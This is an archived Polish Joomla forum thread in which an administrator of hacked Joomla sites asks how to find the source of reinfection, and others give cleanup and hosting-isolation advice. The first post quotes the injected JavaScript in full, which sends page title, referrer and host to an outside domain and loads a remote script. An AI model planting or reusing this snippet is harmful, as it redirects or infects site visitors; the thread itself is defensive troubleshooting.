PDA

Zobacz pełną wersję : Złośliwy kod w index.php a data pliku bez zmian?



ded
22-01-2016, 08:52
Problemy z joomlą zaczęły mi się odkąd pojawiły się ostatnie 0-day. Moja wina, bo niektóre strony nie były aktualizowane. Poszyściłem, poprzywracałem zdrowe kopie, zaktualizowałem do najnowszej wersji i znów to samo... Już mi ręce opadają więc może mi pomożecie.

W pliku index.php templatki mam wstrzyknięty kod typu:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.designer-beds.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Pliki jednak mają datę i godzinę dokładnie tą, w której edytowałem je aby wyczyścić. Wydaje mi się to conajmniej dziwne.

Zostało mi kilka joomli, których nie zdążyłem zaktualizować, ale wyłączyłem te domeny i nie da rady dostać się do nich przez żaden url, więc założyłem że mogą tak leżeć puki nie będę miał czasu na migrację.

Gdzie i w jaki sposób szukać problemu?

damianoo
22-01-2016, 08:57
Walczyłem z tym samym problemem. Prawdopodobnie przyczyną jest jakiś komponent lub moduł. Wgrałem wszystkie nowe pliki i problem się na szczęście rozwiązał. Za nim wziąłem się za poprawianie plików to usunąłem Total Comandera i zainstalowałem filezilla. Ponadto kupiłem antywirusa GData Total Protection i przeskanowałem komputer. A jak na początku wspomniałem potem wgrałem nowe pliki joomli, komponentów i modułów. Zmieniłem wszystkie hasła i na chwilę obecną od 2 tygodni jest po problemie.

ded
22-01-2016, 10:50
Tylko, że ja mam z 15 joomli + kilka wordpressów i to jest trochę roboty. Boję się też, że nadpisanie plików nie wystarczy i trzeba będzie szukać oddzielnego pliku ze złośliwym kodem. Na razie po logach obczaiłem którą stronę ciągle atakują mi ruski boty. Dzięki za radę, będę próbował.

damianoo
22-01-2016, 11:05
Ja też miałem kilkanaście Joomli, ale po logach doszedłem do tego od której zaczął się problem. Walczyłem z tym kilka miesięcy i się udało. A teraz jestem o nowe doświadczenia mądrzejszy. Zablokuj sobie Rosję i Azję oraz wszystko oprócz google w pliku .htaccess

zwiastun
22-01-2016, 11:42
Boję się też, że nadpisanie plików nie wystarczy i trzeba będzie szukać oddzielnego pliku ze złośliwym kodem.
Drogi Kolego! Nie obraź się, bo nie po to piszę, by Ci sprawić przykrość, tylko by dosadnie Ci uświadomić TWOJE ZADANIE I ODPOWIEDZIALNOŚĆ.
Jeśli zarządzasz tyloma witrynami, to powinieneś mieć przynajmniej świadomość zagrożeń, jakie niesie za sobą Internet oraz ogólną wiedzę o tym, jak postępować po włamaniu.
Gdybyś tę wiedzę miał, nie pisałbyś takich dyrdymałów, na które nawet początkujący użytkownik nie powinien sobie pozwolić.

Nic Ci nie pomoże ani zaktualizowanie Joomla, ani nadpisanie plików, w których znalazłeś kod.
Postępowanie po włamaniu zostało opisane bardzo dokładnie na joomla.pl, ogólniej na wiki.joomla.pl, a ponadto w dziesiątkach postów i odpowiedzi na forum.
Krótko:
1. musisz wykryć, w jaki sposób dokonano włamania (bo inaczej nie usuniesz przyczyny).
2. musisz usunąć przyczynę.
3. musisz wykryć i usunąć wszystkie obce ingerencje w system plików (i być może bazy danych)
4. musisz zabezpieczyć witryny.

Gall Anonim
22-01-2016, 11:48
Ruch nr 1 separacja wszystkich domen (inaczej zawirusowana będzie atakować wyczyszczoną)
Ruch nr 2 zmiana wszystkich haseł
Ruch nr 3 zabranie się za porządki :-)

ded
22-01-2016, 12:24
@Zwiastun, wierzę że większość osób która tu przychodzi nie czyta zanim zada pytanie. Ja zrobiłem inaczej ale matetiały które znalazłem są za bardzo ogólne, zupełnie brak przykładów i niestety zmuszony byłem zapytać. Nie traktuj mnie protekcjonalnie. Piszesz o usunięciu ingerencji w system plików. Odkąd zaczęły się problemy codziennie odpytywałem serwer o zmienione pliki i analizowałem czy coś nie przybyło. Okazuje się, że daty plików mówią, że nie a w plikach jest złośliwy kod. Uznałem, że mnie to przerasta i dalatego zapytałem. Nie liczę na rozwiązanie "na tacy". Nie chcę się usprawiedliwiać bo włam jest zapewne przez moje zaniedbanie, w sumie jak 99% :P

@Gall, piszesz o separacji domen. Mam hosting w Progreso. Jak mogę to zrobić. Gdybym namierzył konkretną stronę która powoduje problem to opanowanie tego byłoby dużo łatwiejsze. Strony nie są mocno rozbudowane, dysponuję kopiami ale to także nie jest sposób rozwiązania. Podeślesz mi jakieś konretne info jak mozna odseparować strony?


Zablokuj sobie Rosję i Azję oraz wszystko oprócz google w pliku .htaccess
Moge prosić o jakiś przykład, np Twój plik?

Gall Anonim
22-01-2016, 13:05
Separacja katalogu parkowania domeny odbywa się z wykorzystaniem parametru open_basedir i odpowiednimi zmiennymi do tego parametru - nie mam zielonego pojęcia w jaki sposób jest uruchamiana na progresso ponieważ jest to zależne od konfiguracji serwera dostawcy n.p linuxpl.com (zresztą mój ulubiony dostawca) wykonuje to sam na prośbę mailową klienta, nazwa.pl nie udostępnia takiej możliwości w ogóle, home.pl ma dostępną opcję w panelu klienta - a jak ma progresso - nie mam pojęcia :-) Pytanie więc do obsługi progresso :-)

- - - Updated - - -

Jeszcze jedno - data modyfikacji pliku przy dobrze napisanym skrypcie atakującym nie jest wykładnią ponieważ pliki do których zostaje dodany kod mają zachowaną datę orginalną a pliki dodane po za rdzeniem otrzymują datę założenia katalogu. Osoby piszące takie skrypty mają naprawdę dużą wiedzę i umiejętności oraz doskonale orientują się w metodach naprawy więc starają również po stronie swojej przeciwdziałać wykrywaniu daną metodą. Tak więc obecnie w wielu przypadkach weryfikację po dacie można sobie o kant ...... potłuc.
Pzdr

ded
22-01-2016, 13:09
Dzięki, myślałem że sam to muszę zrobić. Zapytam zaraz.

Wysłane z mojego ONE A2003 przy użyciu Tapatalka

damianoo
22-01-2016, 13:22
Mam pytanie, jaki hosting wybrać z separacją? linuxpl czy może home.pl ?

Gall Anonim
22-01-2016, 13:43
linuxpl

ded
22-01-2016, 15:17
Niestety progreso nie ma możliwości separowania folderów, dostałem właśnie odpowiedź z helpdesku. Szkoda ale chyba namierzyłem stronę, która powoduje problem. Posprzątałem i jak na razie nie ma wrzutki. Na razie zablokowałem dostęp do dolderu administrator i jak będzie ok to posprzątam. Chyba najłatwiej to porównywarką zawartości folderów z folderem czystej joomli?

k@m!l
30-01-2016, 22:53
Co do serwerów to również polecam linuxpl.com. A w kwestii zabezpieczania stron, to tak jak napisałem tutaj: http://forum.joomla.pl/showthread.php?81959-Atak-na-Jooml%C4%99-naprawa-zabezpieczenie-i-co-dalej-cz-2&p=361833&viewfull=1#post361833 polecam zainstalowanie admintoolsa i poprawne skonfigurowanie go.

Gall Anonim
31-01-2016, 01:44
Niestety progreso nie ma możliwości separowania folderów
To zapytaj inną osobę = bo ma i realizuję się to poprzez php.ini

ded
31-01-2016, 17:33
Admin mi powiedział, że się nie da. Jeśli jest sposób aby to włączyć samemu to powiedz jak. Puki co przeniosłem część serwisów łaśnie na LinuxPL i o separację każdego folderu trzeba prosić admina.

wezykowski
01-03-2016, 22:02
Puki co przeniosłem część serwisów łaśnie na LinuxPL i o separację każdego folderu trzeba prosić admina.

Z tego co pamiętam to na linux.pl nie trzeba prosić admina o separację. Można ją samodzielnie wykonać.

Jac
01-03-2016, 22:21
@wezykowski, jesteś pewien, że można samodzielnie wykonać separację folderów na linuxpl.com? Ostatnio również musiałem prosić adminów o wykonanie tego za mnie.

Gall Anonim
01-03-2016, 22:47
Nie ma możliwości wykonania samodzielnie separacji katalogów na linuxpl.com
Podstawa wypowiedzi:
Pytanie o możliwość a potem prośba o separacje przy każdej kolejnej witrynie.
Pzdr

wezykowski
01-03-2016, 22:50
Faktycznie. Sprawdziłem i jest tak jak twierdzicie. Ja chyba pomyliłem to z hosting.linux.pl (http://hosting.linux.pl), albo z jakimś innym podobnie brzmiącym linuxem. Sorry!

Rabmak55
12-03-2016, 20:31
Też borykałem się z tym problemem dość długo, na szczęście udało się choć wymagało mojej cierpliwości